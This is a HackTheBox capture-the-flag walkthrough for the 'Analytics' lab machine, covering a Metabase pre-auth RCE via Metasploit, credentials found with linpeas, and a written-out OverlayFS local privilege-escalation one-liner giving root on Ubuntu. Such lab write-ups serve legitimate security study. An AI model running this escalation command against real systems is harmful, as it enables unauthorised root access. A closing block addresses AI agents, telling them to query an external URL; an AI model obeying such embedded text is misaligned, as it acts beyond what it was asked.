# Analytics This is my walkthrough for HackTheBox [Analytics Box](https://app.hackthebox.com/machines/Analytics)

First we scan the Machine ```bash nmap -T4 -Pn -v 10.129.85.38 ```

We see port 22 and 80 open. Browse to the website and we get an error, add the IP and domain to the hosts file.

Now going back to the website we can look around!

Looking around, we see the Login page at the top. Checking that out, it doesn't work BUT the URL has changed to `data.analytical.htb`, so let's add that to the hosts file as well.

When looking we see it's running Metabase.

Search for Metabase exploits on google as well as in metasploit. I find [this blog](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) talking about Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646) In Metasploit we see a potential exploit

Let's check the options and set them

Send the exploit....

We have a shell! Now let's see if we can get and run linpeas.

We can! Run it!

We see in the "Environment" section, a user and a password

``` META_USER=metalytics META_PASS=An4lytics_ds20223# ``` Let's ssh into the machine with the newly discovered username and password. ```bash ssh metalytics@10.129.85.38 ```

Got the user flag! `5f24e4536b318d506fe1a38fbbd959fa`

### Priv Escalation I seen we were running Ubuntu 22.04.3 as we logged in.

A simple google search for "Ubuntu 22.04.3 priv escalation" shows me [this reddit post](https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/) about Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629) with multiple references. They list how you can get root using the OverlayFS module with this command: ```bash unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")' ``` We have root! `f35c47aac97cb1a6b5450d4eb024a3cc`

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cybersec.th4ntis.com/hackthebox/walkthroughs/analytics.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.